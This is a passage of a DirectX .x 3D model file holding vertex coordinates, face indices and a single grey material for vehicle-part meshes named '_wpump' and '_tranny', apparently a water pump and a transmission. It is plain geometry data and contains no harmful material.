-0.774848;0.127158;-1.446496;, -0.770181;0.120135;-1.451592;, -0.809974;0.134821;-1.376689;, -0.811487;0.131757;-1.353200;, -0.781044;0.136486;-1.353201;, -0.783310;0.139895;-1.374719;, -0.845103;0.137147;-1.353199;, -0.843588;0.140209;-1.376688;, -0.866789;0.152525;-1.375288;, -0.871042;0.150917;-1.353198;, -0.841343;0.136827;-1.422228;, -0.836437;0.129443;-1.450994;, -0.857764;0.138941;-1.457760;, -0.864543;0.149143;-1.420828;, -0.805070;0.127435;-1.443111;, -0.809977;0.134821;-1.414347;, -0.783311;0.139895;-1.412376;, -0.780491;0.135650;-1.436301;, -0.216334;-0.249320;-1.410829;, -0.220018;-0.249594;-1.394401;, -0.218248;-0.279425;-1.394402;, -0.214751;-0.276001;-1.409575;, -0.210398;-0.215473;-1.394402;, -0.206714;-0.215199;-1.410829;, -0.189900;-0.191263;-1.408818;, -0.192165;-0.187854;-1.394402;, -0.221517;-0.241523;-1.460754;, -0.218369;-0.246262;-1.442328;, -0.216786;-0.272942;-1.441074;, -0.221807;-0.265387;-1.467665;, -0.206716;-0.215199;-1.434284;, -0.209865;-0.210462;-1.452709;, -0.190953;-0.189679;-1.445902;, -0.189900;-0.191263;-1.432273;, -0.236632;-0.218781;-1.481363;, -0.229972;-0.228799;-1.475700;, -0.230262;-0.252663;-1.482610;, -0.243312;-0.233025;-1.501078;, -0.211969;-0.207293;-1.456513;, -0.218628;-0.197274;-1.462177;, -0.197030;-0.180536;-1.451607;, -0.193059;-0.186510;-1.449706;, -0.274638;-0.179661;-1.486246;, -0.246866;-0.203379;-1.485271;, -0.253549;-0.217624;-1.504984;, -0.286222;-0.187359;-1.509344;, -0.224464;-0.188493;-1.462177;, -0.252235;-0.164774;-1.463153;, -0.225180;-0.146796;-1.451606;, -0.202866;-0.171754;-1.451607;, -0.333837;-0.115888;-1.459303;, -0.271926;-0.110944;-1.451605;, -0.298979;-0.128923;-1.463152;, -0.379111;-0.137752;-1.459301;, -0.409858;-0.149412;-1.474699;, -0.388514;-0.143451;-1.497793;, -0.357766;-0.131790;-1.482395;, -0.322908;-0.144825;-1.486245;, -0.334491;-0.152521;-1.509342;, -0.142289;-0.312144;-1.407564;, -0.143461;-0.316199;-1.394403;, -0.110936;-0.310086;-1.394404;, -0.113200;-0.306679;-1.408821;, -0.178644;-0.311852;-1.394403;, -0.177474;-0.307798;-1.407563;, -0.201966;-0.295240;-1.409575;, -0.205462;-0.298667;-1.394402;, -0.453087;-0.147524;-1.555537;, -0.514581;-0.146172;-1.555535;, -0.517878;-0.159294;-1.520891;, -0.452558;-0.161339;-1.520893;, -0.513400;-0.117915;-1.578629;, -0.451907;-0.119267;-1.578631;, -0.507541;-0.034528;-1.590721;, -0.327582;-0.141452;-1.555540;, -0.389045;-0.129636;-1.555539;, -0.388514;-0.143451;-1.520894;, -0.334491;-0.152521;-1.532443;, -0.383806;-0.100244;-1.578632;, -0.322344;-0.112062;-1.578634;, -0.295292;-0.094084;-1.590182;, -0.333531;-0.024071;-1.590181;, -0.439440;-0.015506;-1.590723;, -0.236669;-0.218728;-1.547087;, -0.279311;-0.176290;-1.555541;, -0.286222;-0.187359;-1.532444;, -0.253549;-0.217624;-1.528085;, -0.256911;-0.161402;-1.578636;, -0.214267;-0.203840;-1.570182;, -0.189311;-0.192157;-1.580037;, -0.229856;-0.143424;-1.590183;, -0.148024;-0.303518;-1.465062;, -0.142291;-0.312144;-1.431020;, -0.113202;-0.306679;-1.432275;, -0.119873;-0.296642;-1.470402;, -0.177474;-0.307798;-1.425997;, -0.183208;-0.299170;-1.460041;, -0.206989;-0.287685;-1.454600;, -0.201966;-0.295240;-1.428008;, -0.192803;-0.284734;-1.501529;, -0.212754;-0.254714;-1.533557;, -0.229633;-0.253611;-1.514556;, -0.216582;-0.273248;-1.496089;, -0.181314;-0.253428;-1.549888;, -0.161364;-0.283447;-1.517860;, -0.133210;-0.276572;-1.523198;, -0.156356;-0.241744;-1.559744;, -0.064281;-0.232575;-1.407566;, -0.060088;-0.233066;-1.394406;, -0.061858;-0.203235;-1.394406;, -0.066372;-0.205130;-1.409579;, -0.069708;-0.267187;-1.394406;, -0.073901;-0.266697;-1.407566;, -0.090209;-0.291397;-1.408822;, -0.087941;-0.294806;-1.394405;, -0.298872;0.120427;-1.555541;, -0.261106;0.063599;-1.555542;, -0.248532;0.068977;-1.520898;, -0.288878;0.129691;-1.520897;, -0.283508;0.048711;-1.578635;, -0.321273;0.105540;-1.578634;, -0.317095;0.050204;-1.590181;, -0.206366;-0.067373;-1.578637;, -0.242362;-0.013206;-1.578636;, -0.275950;-0.011713;-1.590182;, -0.237710;-0.081726;-1.590183;, -0.219959;0.001680;-1.555543;, -0.183962;-0.052487;-1.555544;, -0.172760;-0.045043;-1.532447;, -0.207386;0.007060;-1.520899;, -0.145877;-0.158394;-1.570183;, -0.175519;-0.113790;-1.578638;, -0.206863;-0.128144;-1.590184;, -0.166317;-0.176877;-1.580037;, -0.153116;-0.098905;-1.555545;, -0.123476;-0.143506;-1.547090;, -0.117954;-0.127515;-1.528089;, -0.141914;-0.091460;-1.532448;, -0.070016;-0.223950;-1.460044;, -0.064282;-0.232575;-1.426000;, -0.066372;-0.205130;-1.428012;, -0.071394;-0.197577;-1.454604;, -0.073901;-0.266697;-1.431022;, -0.079637;-0.258071;-1.465064;, -0.096879;-0.281363;-1.470402;, -0.090209;-0.291397;-1.432276;, -0.092974;-0.238000;-1.517862;, -0.112925;-0.207980;-1.549890;, -0.133364;-0.226463;-1.559745;, -0.110219;-0.261292;-1.523199;, -0.099560;-0.179492;-1.533560;, -0.079609;-0.209512;-1.501532;, -0.080988;-0.183139;-1.496092;, -0.094038;-0.163502;-1.514560;, -0.288877;0.129691;-1.474702;, -0.248530;0.068977;-1.474703;, -0.375247;0.224348;-1.474700;, -0.325680;0.185072;-1.474701;, -0.500756;0.250161;-1.474696;, -0.437572;0.247520;-1.474698;, -0.622128;0.206511;-1.474693;, -0.564799;0.232272;-1.474695;, -0.703667;-0.066118;-1.474691;, -0.756380;-0.013623;-1.474690;, -0.580203;-0.136122;-1.474694;, -0.642132;-0.105064;-1.474693;, -0.452555;-0.161339;-1.474698;, -0.517875;-0.159294;-1.474696;; 609; 4;587,588,296,297;, 4;549,296,588,585;, 4;295,296,549,546;, 4;298,295,546,551;, 4;551,552,301,298;, 4;299,298,301,300;, 4;300,301,512,513;, 4;555,512,301,552;, 4;554,555,552,550;, 4;550,547,557,554;, 4;547,548,560,557;, 5;560,548,586,339,335;, 4;585,586,548,549;, 4;547,546,549,548;, 4;550,551,546,547;, 3;551,550,552;, 4;555,556,511,512;, 4;554,553,556,555;, 4;557,558,553,554;, 4;558,557,560,559;, 4;335,336,559,560;, 4;568,559,336,332;, 4;558,559,568,565;, 4;565,562,553,558;, 4;562,563,556,553;, 4;521,511,556,563;, 4;510,511,521,518;, 4;518,515,505,510;, 4;509,510,505,506;, 4;509,506,498,503;, 4;502,503,498,499;, 4;499,498,501,500;, 4;597,598,500,501;, 4;506,507,501,498;, 4;506,505,508,507;, 4;515,516,508,505;, 4;476,489,508,516;, 4;475,476,516,517;, 4;515,514,517,516;, 4;518,519,514,515;, 4;519,518,521,520;, 4;520,521,563,564;, 4;562,561,564,563;, 4;565,566,561,562;, 4;566,565,568,567;, 4;567,568,332,333;, 4;331,330,333,332;, 4;323,324,333,330;, 4;584,567,333,324;, 4;566,567,584,581;, 4;581,578,561,566;, 4;578,579,564,561;, 4;537,520,564,579;, 4;519,520,537,534;, 4;534,531,514,519;, 4;531,532,517,514;, 4;468,475,517,532;, 4;467,468,532,533;, 4;460,467,533,528;, 4;459,460,528,529;, 4;452,459,529,496;, 4;451,452,496,497;, 4;216,451,497,213;, 4;219,216,213,214;, 4;172,219,214,169;, 4;175,172,169,170;, 4;96,175,170,93;, 4;99,96,93,94;, 4;27,99,94,25;, 4;24,25,94,95;, 4;93,92,95,94;, 4;92,93,170,171;, 4;169,168,171,170;, 4;168,169,214,215;, 4;213,212,215,214;, 4;212,213,497,494;, 4;495,494,497,496;, 4;495,496,529,526;, 4;527,526,529,528;, 4;526,527,522,523;, 4;523,522,525,524;, 4;523,524,493,490;, 4;491,490,493,492;, 4;494,495,490,491;, 4;490,495,526,523;, 4;212,494,491,209;, 4;208,209,491,492;, 4;209,208,211,210;, 4;215,212,209,210;, 4;168,215,210,165;, 4;171,168,165,166;, 4;92,171,166,89;, 4;95,92,89,90;, 4;24,95,90,46;, 4;45,46,90,91;, 4;89,88,91,90;, 4;88,89,166,167;, 4;165,164,167,166;, 4;164,165,210,211;, 4;164,211,238,161;, 4;167,164,161,162;, 4;88,167,162,85;, 4;91,88,85,86;, 4;45,91,86,43;, 4;42,43,86,87;, 4;85,84,87,86;, 4;84,85,162,163;, 4;161,160,163,162;, 4;160,161,238,239;, 4;237,236,239,238;, 4;236,237,545,542;, 4;543,542,545,544;, 4;543,544,576,573;, 4;574,573,576,575;, 4;574,575,580,577;, 4;525,536,580,575;, 4;535,536,525,522;, 4;522,527,530,535;, 4;527,528,533,530;, 4;531,530,533,532;, 4;534,535,530,531;, 4;535,534,537,536;, 4;536,537,579,580;, 4;578,577,580,579;, 4;581,582,577,578;, 4;582,581,584,583;, 4;582,583,572,569;, 4;570,569,572,571;, 4;570,571,541,538;, 4;539,538,541,540;, 4;232,233,539,540;, 4;233,232,235,234;, 4;156,157,234,235;, 4;157,156,159,158;, 4;80,81,158,159;, 4;81,80,83,82;, 4;39,40,82,83;, 4;39,83,110,37;, 4;83,80,109,110;, 4;80,159,154,109;, 4;159,156,153,154;, 4;156,235,230,153;, 4;235,232,229,230;, 4;232,540,309,229;, 4;540,541,308,309;, 4;541,571,317,308;, 4;571,572,316,317;, 4;315,314,317,316;, 4;307,308,317,314;, 4;307,306,309,308;, 4;306,307,302,303;, 4;303,302,305,304;, 4;311,312,305,302;, 4;302,307,314,311;, 4;228,229,309,306;, 4;229,228,231,230;, 4;152,153,230,231;, 4;153,152,155,154;, 4;108,109,154,155;, 4;109,108,111,110;, 4;36,37,110,111;, 4;36,111,106,34;, 4;111,108,105,106;, 4;108,155,150,105;, 4;155,152,149,150;, 4;152,231,226,149;, 4;231,228,225,226;, 4;225,224,227,226;, 4;148,149,226,227;, 4;149,148,151,150;, 4;104,105,150,151;, 4;105,104,107,106;, 4;33,34,106,107;, 4;33,107,102,31;, 4;107,104,101,102;, 4;104,151,146,101;, 4;151,148,145,146;, 4;148,227,222,145;, 4;227,224,221,222;, 4;224,304,456,221;, 4;224,225,303,304;, 4;228,306,303,225;, 4;304,305,455,456;, 4;305,312,464,455;, 4;454,455,464,461;, 4;462,461,464,463;, 4;462,463,472,469;, 4;470,469,472,471;, 4;470,471,480,477;, 4;478,477,480,479;, 4;478,479,482,483;, 4;454,453,456,455;, 4;220,221,456,453;, 4;221,220,223,222;, 4;144,145,222,223;, 4;145,144,147,146;, 4;100,101,146,147;, 4;101,100,103,102;, 4;30,31,102,103;, 4;30,103,98,28;, 4;103,100,97,98;, 4;100,147,174,97;, 4;147,144,173,174;, 4;144,223,218,173;, 4;223,220,217,218;, 4;220,453,450,217;, 4;453,454,449,450;, 4;449,454,461,458;, 4;458,459,452,449;, 4;450,449,452,451;, 4;216,217,450,451;, 4;217,216,219,218;, 4;172,173,218,219;, 4;173,172,175,174;, 4;96,97,174,175;, 4;97,96,99,98;, 4;27,28,98,99;, 4;492,493,544,545;, 4;493,524,576,544;, 4;524,525,575,576;, 4;573,574,569,570;, 4;538,543,573,570;, 4;542,543,538,539;, 4;236,542,539,233;, 4;239,236,233,234;, 4;160,239,234,157;, 4;163,160,157,158;, 4;84,163,158,81;, 4;87,84,81,82;, 4;42,87,82,40;, 4;211,208,237,238;, 4;208,492,545,237;, 4;569,574,577,582;, 4;572,583,325,316;, 4;315,316,325,322;, 4;323,322,325,324;, 4;583,584,324,325;, 4;331,332,336,337;, 3;510,512,511;, 4;510,509,513,512;, 4;503,504,513,509;, 3;503,502,504;, 3;40,39,41;, 4;44,42,40,41;, 3;43,42,44;, 4;47,45,43,44;, 8;32,29,26,47,44,41,38,35;, 4;38,36,34,35;, 3;37,36,38;, 4;41,39,37,38;, 3;34,33,35;, 4;35,33,31,32;, 3;31,30,32;, 4;32,30,28,29;, 3;28,27,29;, 4;29,27,25,26;, 3;25,24,26;, 4;26,24,46,47;, 3;46,45,47;, 4;314,315,310,311;, 4;310,315,322,319;, 4;322,323,318,319;, 4;318,323,330,327;, 4;330,331,326,327;, 4;326,331,337,341;, 4;341,342,329,326;, 4;327,326,329,328;, 4;327,328,321,318;, 4;319,318,321,320;, 4;319,320,313,310;, 4;311,310,313,312;, 4;312,313,463,464;, 4;313,320,472,463;, 4;320,321,471,472;, 4;321,328,480,471;, 4;328,329,479,480;, 4;329,342,482,479;, 4;340,481,482,342;, 3;340,586,481;, 3;586,340,338;, 3;586,338,339;, 4;339,338,334,335;, 3;338,340,334;, 4;337,334,340,341;, 4;335,334,337,336;, 3;341,340,342;, 3;482,481,483;, 4;483,481,487,488;, 4;473,478,483,488;, 4;488,489,476,473;, 4;474,473,476,475;, 4;474,475,468,465;, 4;466,465,468,467;, 4;466,467,460,457;, 4;458,457,460,459;, 4;461,462,457,458;, 4;457,462,469,466;, 4;469,470,465,466;, 4;465,470,477,474;, 4;477,478,473,474;, 4;484,481,586,597;, 3;597,586,585;, 9;387,597,585,588,587,590,589,592,591;, 4;387,595,598,597;, 3;486,488,487;, 3;488,486,489;, 4;489,486,507,508;, 5;501,507,486,485,597;, 3;484,597,485;, 4;486,487,484,485;, 3;484,487,481;, 4;267,500,598,595;, 4;499,500,267,264;, 4;502,499,264,269;, 4;269,270,504,502;, 3;269,268,270;, 4;276,277,270,268;, 4;276,275,278,277;, 4;277,278,357,358;, 3;357,354,358;, 3;355,354,357;, 4;354,355,350,351;, 4;351,350,353,352;, 4;352,353,391,388;, 4;389,388,391,390;, 4;388,389,386,387;, 3;386,389,383;, 4;385,383,389,390;, 4;396,393,385,390;, 4;390,391,399,396;, 4;399,391,353,361;, 4;360,361,353,350;, 4;363,360,350,355;, 4;355,356,366,363;, 3;355,357,356;, 4;285,286,356,357;, 3;285,357,278;, 4;284,285,278,275;, 4;275,272,279,284;, 4;272,273,282,279;, 5;282,273,594,421,417;, 3;594,420,421;, 4;421,420,416,417;, 3;420,422,416;, 4;419,416,422,423;, 4;429,426,419,423;, 4;429,430,425,426;, 4;445,442,425,430;, 4;445,446,441,442;, 4;433,438,441,446;, 4;437,438,433,434;, 4;434,433,436,435;, 4;446,447,436,433;, 4;446,445,448,447;, 4;430,431,448,445;, 4;430,429,432,431;, 4;423,424,432,429;, 3;423,422,424;, 3;420,424,422;, 7;595,384,424,420,594,593,596;, 3;384,595,383;, 3;595,387,383;, 4;595,596,266,267;, 4;265,264,267,266;, 4;268,269,264,265;, 4;268,265,271,276;, 4;265,266,274,271;, 4;274,266,596,593;, 4;593,594,273,274;, 4;272,271,274,273;, 4;275,276,271,272;, 4;284,283,286,285;, 4;283,284,279,280;, 4;280,279,282,281;, 4;417,418,281,282;, 3;417,416,418;, 3;418,416,419;, 4;426,427,418,419;, 4;426,425,428,427;, 4;442,443,428,425;, 4;442,441,444,443;, 4;438,439,444,441;, 4;438,437,440,439;, 4;242,243,439,440;, 4;243,250,444,439;, 4;250,251,443,444;, 4;251,258,428,443;, 4;257,258,251,248;, 4;248,253,260,257;, 4;253,254,263,260;, 4;253,252,255,254;, 4;245,246,255,252;, 4;245,244,247,246;, 4;244,245,240,241;, 4;240,245,252,249;, 4;249,250,243,240;, 4;241,240,243,242;, 4;249,248,251,250;, 4;252,253,248,249;, 4;381,382,254,255;, 4;370,381,255,246;, 4;369,370,246,247;, 4;368,367,370,369;, 4;380,381,370,367;, 4;380,379,382,381;, 4;364,365,382,379;, 4;364,363,366,365;, 4;365,366,262,263;, 4;261,260,263,262;, 4;260,261,256,257;, 4;257,256,259,258;, 4;258,259,427,428;, 4;259,281,418,427;, 4;280,281,259,256;, 4;256,261,283,280;, 4;261,262,286,283;, 4;366,356,286,262;, 4;363,364,359,360;, 4;360,359,362,361;, 4;398,399,361,362;, 4;397,396,399,398;, 4;396,397,392,393;, 4;412,409,392,397;, 4;397,398,415,412;, 4;415,398,362,377;, 4;414,415,377,378;, 4;413,412,415,414;, 4;412,413,408,409;, 4;400,405,408,413;, 4;413,414,403,400;, 4;401,400,403,402;, 4;404,405,400,401;, 4;405,404,407,406;, 4;405,406,411,408;, 4;409,408,411,410;, 4;409,410,395,392;, 4;393,392,395,394;, 4;393,394,384,385;, 3;384,383,385;, 4;432,424,384,394;, 4;431,432,394,395;, 4;448,431,395,410;, 4;447,448,410,411;, 4;436,447,411,406;, 4;435,436,406,407;, 4;403,414,378,373;, 4;402,403,373,374;, 4;372,371,374,373;, 4;372,373,378,375;, 4;376,375,378,377;, 4;376,377,362,359;, 4;379,376,359,364;, 4;379,380,375,376;, 4;367,372,375,380;, 4;371,372,367,368;, 4;382,365,263,254;, 5;346,352,388,387,591;, 4;351,352,346,343;, 4;354,351,343,348;, 4;348,349,358,354;, 3;348,347,349;, 4;347,348,343,344;, 4;344,343,346,345;, 4;591,592,345,346;, 4;290,345,592,589;, 4;589,590,289,290;, 4;297,289,590,587;, 4;288,289,297,294;, 4;291,288,294,299;, 4;299,300,293,291;, 8;270,277,358,349,293,300,513,504;, 4;292,293,349,347;, 3;292,291,293;, 4;298,299,294,295;, 4;295,294,297,296;, 4;288,287,290,289;, 4;291,292,287,288;, 4;347,344,287,292;, 4;344,345,290,287;, 3;383,387,386;, 4;57,56,59,58;, 4;21,22,58,59;, 4;0,63,58,22;, 4;63,60,57,58;, 4;60,139,134,57;, 4;139,136,133,134;, 4;133,132,135,134;, 4;56,57,134,135;, 4;56,135,130,53;, 4;59,56,53,54;, 4;21,59,54,19;, 4;18,19,54,55;, 4;53,52,55,54;, 4;52,53,130,131;, 4;129,128,131,130;, 4;128,129,206,207;, 4;205,204,207,206;, 4;204,205,374,371;, 4;176,402,374,205;, 4;176,177,401,402;, 4;180,404,401,177;, 4;183,180,177,178;, 4;136,183,178,133;, 4;132,133,178,179;, 4;177,176,179,178;, 4;179,176,205,206;, 4;132,179,206,129;, 4;135,132,129,130;, 4;131,128,125,126;, 4;52,131,126,49;, 4;55,52,49,50;, 4;18,55,50,16;, 4;15,16,50,51;, 4;49,48,51,50;, 4;48,49,126,127;, 4;125,124,127,126;, 4;124,125,202,203;, 4;201,200,203,202;, 4;200,201,368,369;, 4;200,369,247,197;, 4;203,200,197,198;, 4;124,203,198,121;, 4;127,124,121,122;, 4;48,127,122,77;, 4;51,48,77,78;, 4;15,51,78,13;, 4;12,13,78,79;, 4;77,76,79,78;, 4;76,77,122,123;, 4;121,120,123,122;, 4;120,121,198,199;, 4;197,196,199,198;, 4;196,197,247,244;, 4;196,244,241,193;, 4;192,193,241,242;, 4;193,192,195,194;, 4;116,117,194,195;, 4;117,116,119,118;, 4;72,73,118,119;, 4;73,72,75,74;, 4;9,10,74,75;, 4;12,79,74,10;, 4;79,76,73,74;, 4;76,123,118,73;, 4;123,120,117,118;, 4;120,199,194,117;, 4;199,196,193,194;, 4;195,192,189,190;, 4;116,195,190,113;, 4;119,116,113,114;, 4;72,119,114,69;, 4;75,72,69,70;, 4;9,75,70,7;, 4;6,7,70,71;, 4;69,68,71,70;, 4;68,69,114,115;, 4;113,112,115,114;, 4;112,113,190,191;, 4;189,188,191,190;, 4;188,189,440,437;, 4;192,242,440,189;, 4;188,437,434,185;, 4;191,188,185,186;, 4;112,191,186,141;, 4;115,112,141,142;, 4;68,115,142,65;, 4;71,68,65,66;, 4;6,71,66,4;, 4;3,4,66,67;, 4;65,64,67,66;, 4;64,65,142,143;, 4;141,140,143,142;, 4;140,141,186,187;, 4;185,184,187,186;, 4;184,185,434,435;, 4;184,435,407,181;, 4;187,184,181,182;, 4;140,187,182,137;, 4;143,140,137,138;, 4;64,143,138,61;, 4;67,64,61,62;, 4;3,67,62,1;, 4;0,1,62,63;, 4;61,60,63,62;, 4;60,61,138,139;, 4;137,136,139,138;, 4;136,137,182,183;, 4;181,180,183,182;, 4;180,181,407,404;, 4;204,371,368,201;, 4;207,204,201,202;, 4;128,207,202,125;, 3;22,21,23;, 4;2,0,22,23;, 3;1,0,2;, 4;5,3,1,2;, 8;8,5,2,23,20,17,14,11;, 4;20,18,16,17;, 3;19,18,20;, 4;23,21,19,20;, 3;16,15,17;, 4;17,15,13,14;, 3;13,12,14;, 4;14,12,10,11;, 3;10,9,11;, 4;11,9,7,8;, 3;7,6,8;, 4;8,6,4,5;, 3;4,3,5;; MeshMaterialList { 1; 609; 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;; Material { 0.498039;0.498039;0.498039;1.0;; 60.0; 0.000000;0.000000;0.000000;; 0.000000;0.000000;0.000000;; } # Material } # MeshMaterialList } # Mesh } # Frame _wpump Frame _tranny { FrameTransformMatrix { 1.000000, 0.000000, 0.000000, 0.000000, 0.000000, 1.000000, 0.000000, 0.000000, 0.000000, 0.000000, 1.000000, 0.000000, 0.000000, 0.000000, 0.000000, 1.000000;; } #FrameTransformMatrix Mesh tranny { 362; -0.498095;0.105568;0.470144;, -0.732666;0.102295;0.470145;, -0.773210;0.082651;0.470144;, -0.819545;0.033543;0.470145;, -0.862983;-0.031935;0.470145;, -0.944070;-0.074496;0.470145;, -0.964343;-0.110508;0.470145;, -0.964343;-0.306941;0.470145;, -0.964343;-0.496826;0.470145;, -0.964057;-0.532021;0.470145;, -0.955748;-0.565942;0.470144;, -0.939975;-0.596287;0.470145;, -0.917811;-0.621004;0.470144;, -0.890753;-0.638417;0.470146;, -0.860637;-0.647347;0.470145;, -0.829504;-0.647187;0.470145;, -0.799462;-0.637949;0.470144;, -0.772545;-0.620260;0.470144;, -0.750593;-0.595336;0.470144;, -0.729770;-0.598316;0.470145;, -0.689678;-0.651506;0.470145;, -0.640340;-0.693610;0.470143;, -0.584105;-0.722625;0.470145;, -0.523693;-0.737168;0.470145;, -0.498095;-0.742366;0.470144;, -0.498095;-0.742366;0.499568;, -0.498095;0.105568;0.499568;, -0.732666;0.102295;0.499568;, -0.773210;0.082651;0.499568;, -0.819544;0.033543;0.499567;, -0.862984;-0.031935;0.499567;, -0.944070;-0.074496;0.499568;, -0.964343;-0.110508;0.499567;, -0.964343;-0.306941;0.499567;, -0.964343;-0.496826;0.499567;, -0.964057;-0.532021;0.499567;, -0.955749;-0.565942;0.499567;, -0.939975;-0.596287;0.499567;, -0.917810;-0.621004;0.499567;, -0.890753;-0.638417;0.499568;, -0.860639;-0.647347;0.499567;, -0.829506;-0.647187;0.499567;, -0.799462;-0.637949;0.499568;, -0.772545;-0.620260;0.499568;, -0.750592;-0.595336;0.499568;, -0.729770;-0.598316;0.499568;, -0.689677;-0.651506;0.499568;, -0.640340;-0.693610;0.499568;, -0.584105;-0.722625;0.499567;, -0.523695;-0.737168;0.499568;, -0.640341;-0.643323;0.837583;, -0.584106;-0.672339;0.837583;, -0.523695;-0.686882;0.837584;, -0.498094;-0.692080;0.837583;, -0.498094;0.000280;0.837583;, -0.732666;-0.002994;0.837583;, -0.773210;-0.022636;0.837584;, -0.819544;-0.071745;0.837583;, -0.862983;-0.137222;0.837584;, -0.944071;-0.179783;0.837583;, -0.964344;-0.215796;0.837584;, -0.964343;-0.412229;0.837584;, -0.955491;-0.483619;0.798422;, -0.951549;-0.513358;0.782245;, -0.940434;-0.543094;0.769837;, -0.922899;-0.570812;0.762045;, -0.900136;-0.594635;0.759392;, -0.873682;-0.612948;0.762061;, -0.845331;-0.624510;0.769870;, -0.817004;-0.628539;0.782290;, -0.790625;-0.624761;0.798479;, -0.767971;-0.613435;0.817340;, -0.750592;-0.595336;0.837584;, -0.729770;-0.598316;0.837583;, -0.689678;-0.601220;0.837583;, -0.722836;-0.567918;1.050495;, -0.704303;-0.570570;1.050494;, -0.668617;-0.573154;1.050494;, -0.624703;-0.610630;1.050495;, -0.574650;-0.636455;1.050494;, -0.520879;-0.649399;1.050494;, -0.498095;-0.654026;1.050493;, -0.498095;-0.037773;1.050493;, -0.706882;-0.040687;1.050494;, -0.742968;-0.058171;1.050493;, -0.784210;-0.101881;1.050494;, -0.822875;-0.160161;1.050495;, -0.895046;-0.198044;1.050494;, -0.913091;-0.230097;1.050494;, -0.913091;-0.404937;1.050494;, -0.895046;-0.198044;1.357930;, -0.913091;-0.230097;1.357928;, -0.913091;-0.404937;1.357928;, -0.722836;-0.567918;1.357928;, -0.704304;-0.570570;1.357928;, -0.668617;-0.573154;1.357929;, -0.624703;-0.610630;1.357929;, -0.574650;-0.636455;1.357928;, -0.520878;-0.649399;1.357929;, -0.498095;-0.654026;1.357929;, -0.498095;-0.037773;1.357929;, -0.706882;-0.040687;1.357928;, -0.742968;-0.058171;1.357929;, -0.784210;-0.101881;1.357929;, -0.822875;-0.160161;1.357928;, 